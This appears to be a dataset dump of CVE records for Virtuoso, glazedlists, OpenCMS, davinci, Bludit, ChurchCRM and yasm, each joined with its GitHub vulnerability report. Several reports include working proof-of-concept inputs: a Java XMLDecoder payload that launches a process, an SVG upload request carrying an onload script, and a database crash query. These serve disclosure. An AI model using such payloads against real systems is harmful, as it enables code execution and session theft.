"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1137 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE VIEW t1(a) AS SELECT 1;
SELECT a, a, a FROM t1 WHERE a IN (1,5) AND a IN (9,8,3025,1000,3969)
ORDER BY a, a DESC;
```
backtrace:
```c
#0 0x6f6462 (sqlo_preds_contradiction+0x442)
#1 0x6fec43 (sqlo_place_table+0xe23)
#2 0x706bab (sqlo_try+0xdb)
#3 0x70818c (sqlo_layout_1+0x94c)
#4 0x6e84fb (sqlo_layout+0x5fb)
#5 0x70c075 (sqlo_top_2+0x335)
#6 0x70b9d5 (sqlo_top_1+0x135)
#7 0x70d4c6 (sqlo_top_select+0x156)
#8 0x6b72bf (sql_stmt_comp+0x8bf)
#9 0x6ba122 (sql_compile_1+0x1a62)
#10 0x7c8cd0 (stmt_set_query+0x340)
#11 0x7cabc2 (sf_sql_execute+0x922)
#12 0x7cbf4e (sf_sql_execute_w+0x17e)
#13 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#14 0xe1f01c (future_wrapper+0x3fc)
#15 0xe2691e (_thread_boot+0x11e)
#16 0x7f8d7a6e8609 (start_thread+0xd9)
#17 0x7f8d7a4b8133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at sqlo_preds_contradiction | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1137/comments | 0 | 2023-04-12T19:36:18Z | 2023-04-14T08:12:15Z | https://github.com/openlink/virtuoso-opensource/issues/1137 | 1,665,131,513 | 1,137 | 5,150 |
CVE-2023-31890 | 2023-05-16T16:15:10.343 | An XML Deserialization vulnerability in glazedlists v1.11.0 allows an attacker to execute arbitrary code via the BeanXMLByteCoder.decode() parameter. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/glazedlists/glazedlists/issues/709"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/glazedlists/glazedlists/issues/709"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:glazedlists:glazed_lists:1.11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8694E3AB-31F4-48E5-B2DD-7EF368721DD6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"502"
] | 502 | https://github.com/glazedlists/glazedlists/issues/709 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"glazedlists",
"glazedlists"
] | vulnerability location: `ca.odell.glazedlists.impl.io.BeanXMLByteCoder`
`BeanXMLByteCoder` class provides `decode()` method to decode the Object from a InputStream.
When the `decode()` method is called, the program will call `XMLDecoder.readObject()` to parse the XML string without any check, which causing a XML Deserialization vulnerability.
_ca.odell.glazedlists.impl.io.BeanXMLByteCoder#decode_

attack payload:
```xml
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="1">
<void index="0"><string>calc</string></void>
</array>
<void method="start"></void>
</object>
</java>
```
use a little program to test.
os: windows 10
jdk: 1.8.0_111
glazedlists: 1.11.0

| XML Deserialization vulnerability in BeanXMLByteCoder | https://api.github.com/repos/glazedlists/glazedlists/issues/709/comments | 5 | 2023-04-26T11:01:08Z | 2025-05-11T21:48:17Z | https://github.com/glazedlists/glazedlists/issues/709 | 1,684,793,557 | 709 | 5,151 |
CVE-2023-31544 | 2023-05-16T21:15:09.027 | A stored cross-site scripting (XSS) vulnerability in alkacon-OpenCMS v11.0.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field under the Upload Image module. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/alkacon/opencms-core/commit/21bfbeaf6b038e2c03bb421ce7f0933dd7a7633e"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/alkacon/opencms-core/issues/652"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/alkacon/opencms-core/commit/21bfbeaf6b038e2c03bb421ce7f0933dd7a7633e"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/alkacon/opencms-core/issues/652"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:alkacon:opencms:11.0:-:*:*:*:*:*:*",
"matchCriteriaId": "745FD94C-C000-4E6B-B294-2805AC3616F2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:alkacon:opencms:11.0:beta:*:*:*:*:*:*",
"matchCriteriaId": "62CE8688-6DE4-4474-A4C5-407B35C7A981",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:alkacon:opencms:11.0:beta2:*:*:*:*:*:*",
"matchCriteriaId": "E88DB6B7-D5DC-464C-B8D7-A364448A5B13",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:alkacon:opencms:11.0:rc:*:*:*:*:*:*",
"matchCriteriaId": "C051CC98-D045-481C-84D3-A86350BCAE42",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/alkacon/opencms-core/issues/652 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"alkacon",
"opencms-core"
] | Hello Team,
I would like to report a vulnerability (cross-site-scripting) which I have observed in current version v11.0.0.0 and before.
Cross-Site Scripting (XSS) allows attacker to inject the malicious JavaScript as user input and then malicious script can access any cookies, session tokens, or other sensitive information associated with impacted applications.
Please refer https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) for more details.
Steps:
1. Log into the application as a low privileged user (Editor Role).

2. Select any folder to upload file.

3. Upload any file.

4. Put the XSS payload in Title of the file

5. Now, log in as any user(including admin), and payload gets executed in folder view when file title gets loaded.

---------------------
Regards,
varunsharma0121@gmail.com | Found Stored XSS in Opencms 11.0.0.0 | https://api.github.com/repos/alkacon/opencms-core/issues/652/comments | 0 | 2019-05-07T13:36:57Z | 2019-08-27T13:31:17Z | https://github.com/alkacon/opencms-core/issues/652 | 441,237,287 | 652 | 5,152 |
CVE-2023-31848 | 2023-05-17T00:15:09.150 | davinci 0.3.0-rc is vulnerable to Server-side request forgery (SSRF). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/edp963/davinci/issues/2326"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/edp963/davinci/issues/2326"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:davinci_project:davinci:0.3.0:rc:*:*:*:*:*:*",
"matchCriteriaId": "DD59B0B9-4295-4442-B22D-93823ED9406F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"918"
] | 918 | https://github.com/edp963/davinci/issues/2326 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"edp963",
"davinci"
] | use a malicious mysql server:
login and then
Mysql JDBC Connection is set as a malicious server

Click Test Connection
two vulnerabilities :
1.arbitrary file read:

success!

2.Server-side request forgery(SSRF) :

Visit Baidu success!

Repair suggestion:
Set these properties to false:allowLoadLocalInfile、allowUrlInLocalInfile | DataSource Mysql JDBC Connection has two vulnerabilities : arbitrary file read and Server-side request forgery(SSRF) | https://api.github.com/repos/edp963/davinci/issues/2326/comments | 0 | 2023-04-23T08:40:55Z | 2023-04-27T06:52:26Z | https://github.com/edp963/davinci/issues/2326 | 1,679,927,837 | 2,326 | 5,153 |
CVE-2023-31698 | 2023-05-17T13:15:09.463 | Bludit v3.14.1 is vulnerable to Stored Cross Site Scripting (XSS) via SVG file on site logo. NOTE: the product's security model is that users are trusted by the administrator to insert arbitrary content (users cannot create their own accounts through self-registration). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/172462/Bludit-CMS-3.14.1-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/bludit/bludit/issues/1212#issuecomment-649514491"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/bludit/bludit/issues/1369#issuecomment-940806199"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://github.com/bludit/bludit/issues/1509"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/172462/Bludit-CMS-3.14.1-Cross-Site-Scripting.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/bludit/bludit/issues/1212#issuecomment-649514491"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/bludit/bludit/issues/1369#issuecomment-940806199"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://github.com/bludit/bludit/issues/1509"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bludit:bludit:3.14.1:*:*:*:*:*:*:*",
"matchCriteriaId": "E1884F54-CD39-43CC-B52B-8B2335A09CDB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/bludit/bludit/issues/1212#issuecomment-649514491 | null | github.com | [
"bludit",
"bludit"
] | ### Describe your problem
https://github.com/bludit/bludit/blob/master/bl-kernel/ajax/logo-upload.php
Logo upload only determines the suffix, but not the content, which causes XSS
and the user can inject any javascript and html code in the page
payload



| Store XSS | https://api.github.com/repos/bludit/bludit/issues/1212/comments | 10 | 2020-06-19T07:23:19Z | 2022-02-22T16:10:21Z | https://github.com/bludit/bludit/issues/1212 | 641,764,976 | 1,212 | 5,154 |
CVE-2023-31698 | 2023-05-17T13:15:09.463 | Bludit v3.14.1 is vulnerable to Stored Cross Site Scripting (XSS) via SVG file on site logo. NOTE: the product's security model is that users are trusted by the administrator to insert arbitrary content (users cannot create their own accounts through self-registration). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/172462/Bludit-CMS-3.14.1-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/bludit/bludit/issues/1212#issuecomment-649514491"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/bludit/bludit/issues/1369#issuecomment-940806199"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://github.com/bludit/bludit/issues/1509"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/172462/Bludit-CMS-3.14.1-Cross-Site-Scripting.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/bludit/bludit/issues/1212#issuecomment-649514491"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/bludit/bludit/issues/1369#issuecomment-940806199"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://github.com/bludit/bludit/issues/1509"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bludit:bludit:3.14.1:*:*:*:*:*:*:*",
"matchCriteriaId": "E1884F54-CD39-43CC-B52B-8B2335A09CDB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/bludit/bludit/issues/1369#issuecomment-940806199 | null | github.com | [
"bludit",
"bludit"
] | Hi i have identified a security vulnerability in your application. Kindly do let me know if we can discuss this in detail.
| Alert: Vulnerability in bludit | https://api.github.com/repos/bludit/bludit/issues/1369/comments | 6 | 2021-10-08T11:24:40Z | 2021-10-19T07:40:57Z | https://github.com/bludit/bludit/issues/1369 | 1,020,989,213 | 1,369 | 5,155 |
CVE-2023-31698 | 2023-05-17T13:15:09.463 | Bludit v3.14.1 is vulnerable to Stored Cross Site Scripting (XSS) via SVG file on site logo. NOTE: the product's security model is that users are trusted by the administrator to insert arbitrary content (users cannot create their own accounts through self-registration). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/172462/Bludit-CMS-3.14.1-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/bludit/bludit/issues/1212#issuecomment-649514491"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/bludit/bludit/issues/1369#issuecomment-940806199"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://github.com/bludit/bludit/issues/1509"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/172462/Bludit-CMS-3.14.1-Cross-Site-Scripting.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/bludit/bludit/issues/1212#issuecomment-649514491"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/bludit/bludit/issues/1369#issuecomment-940806199"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://github.com/bludit/bludit/issues/1509"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bludit:bludit:3.14.1:*:*:*:*:*:*:*",
"matchCriteriaId": "E1884F54-CD39-43CC-B52B-8B2335A09CDB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/bludit/bludit/issues/1509 | [
"Exploit"
] | github.com | [
"bludit",
"bludit"
] | **Description:**
I found Stored Cross-site scripting (XSS) vulnerability in your Bludit - Flat-File CMS (v3.14.1) on "General" settings to "Logo" field. When I send malicious code use svg file after then the browser give me result.
**CMS Version:**
v3.14.1
**Affected URL:**
http://127.0.0.1/bludit/admin/settings
**Steps to Reproduce:**
1. First login your admin panel.
2. then go to General settings and click logo section.

3. Now open notepad and save this code with xss.svg name with extension

4. Now upload this xss.svg file on logo section. So your request data will be:
POST /bludit/admin/ajax/logo-upload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Content-Type: multipart/form-data; boundary=---------------------------15560729415644048492005010998
Referer: http://127.0.0.1/bludit/admin/settings
Cookie: BLUDITREMEMBERUSERNAME=admin; BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985; BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74i
Content-Length: 651
-----------------------------15560729415644048492005010998
Content-Disposition: form-data; name="tokenCSRF"
626c201693546f472cdfc11bed0938aab8c6e480
-----------------------------15560729415644048492005010998
Content-Disposition: form-data; name="inputFile"; filename="xss.svg"
Content-Type: image/svg+xml
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
width="2560.000000pt" height="1600.000000pt" viewBox="0 0 2560.000000 1600.000000"
preserveAspectRatio="xMidYMid meet" onload="alert(document.domain)">
</svg>
-----------------------------15560729415644048492005010998--

5. Now open logo image link that you upload. You will see XSS pop up.

**Proof of Concept:**
You can see the Proof of Concept. Which I've attached screenshots and video to confirm the vulnerability.
https://user-images.githubusercontent.com/41516016/232166257-eb768ab3-d49e-462c-8874-c30fe0127ff3.mp4
**Impact:**
Attackers can make use of this to conduct attacks like phishing, steal sessions etc.
Let me know if any further info is required.
Thanks & Regards
Rahad Chowdhury
Cyber Security Specialist
https://www.linkedin.com/in/rahadchowdhury/ | Stored XSS via SVG file Vulnerability on Bludit v3.14.1 | https://api.github.com/repos/bludit/bludit/issues/1509/comments | 2 | 2023-04-14T22:43:13Z | 2023-07-10T21:54:40Z | https://github.com/bludit/bludit/issues/1509 | 1,669,025,725 | 1,509 | 5,156 |
CVE-2023-31699 | 2023-05-17T13:15:09.517 | ChurchCRM v4.5.4 is vulnerable to Reflected Cross-Site Scripting (XSS) via image file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ChurchCRM/CRM/issues/6471"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ChurchCRM/CRM/issues/6471"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:churchcrm:churchcrm:4.5.4:*:*:*:*:*:*:*",
"matchCriteriaId": "B55D7EE2-CEB8-45EC-A48C-C0A8B90E4E53",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/ChurchCRM/CRM/issues/6471 | [
"Third Party Advisory"
] | github.com | [
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
#### On what page in the application did you find this issue?
I got issue CSVImport.php page.
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Windows Server
#### What browser (and version) are you running?
Brave browser [Version 1.50.119 Chromium: 112.0.5615.121]
#### What version of PHP is the server running?
7.4.29
#### What version of SQL Server are you running?
Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
#### What version of ChurchCRM are you running?
v4.5.4
**Description:**
I found Cross site scripting (XSS) vulnerability in your ChurchCRM (v4.5.4) "Admin" menu to CSV Import page there Import data CSV uploader option. When I upload image file there malicious code inserted in image then the browser give me result. Because a browser can not know if the script should be trusted or not.
**CMS Version:**
v4.5.4
**Affected URL:**
http://127.0.0.1/churchcrm/CSVImport.php
**Steps to Reproduce:**
1. First login your admin panel.
2. Then click "Admin" menu and click "CSV Import" and you will get CSV file uploder option.

3. now insert xss payload in jpg file using exiftool or from image properties.

4. after then upload the jpg file.
5. you will see XSS pop up.

**Proof of Concept:**
You can see the Proof of Concept. Which I've attached screenshots and video to confirm the vulnerability.
https://user-images.githubusercontent.com/41516016/232332389-4fab27fc-e5a4-42cd-aae1-b7c4b60f975a.mp4
**Impact:**
Attackers can make use of this to conduct attacks like phishing, steal sessions etc.
Let me know if any further info is required.
Thanks & Regards
**Rahad Chowdhury**
Cyber Security Specialist
https://www.linkedin.com/in/rahadchowdhury/
| XSS via Image File | https://api.github.com/repos/ChurchCRM/CRM/issues/6471/comments | 4 | 2023-04-16T18:04:50Z | 2024-05-27T02:46:17Z | https://github.com/ChurchCRM/CRM/issues/6471 | 1,670,071,780 | 6,471 | 5,157 |
CVE-2023-31725 | 2023-05-17T15:15:08.957 | yasm 1.3.0.55.g101bc was discovered to contain a heap-use-after-free via the function expand_mmac_params at yasm/modules/preprocs/nasm/nasm-pp.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/DaisyPo/fuzzing-vulncollect/tree/main/yasm/heap-use-after-free/nasm-pp.c:3878%20in%20expand_mmac_params"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/yasm/yasm/issues/221"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/DaisyPo/fuzzing-vulncollect/tree/main/yasm/heap-use-after-free/nasm-pp.c:3878%20in%20expand_mmac_params"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
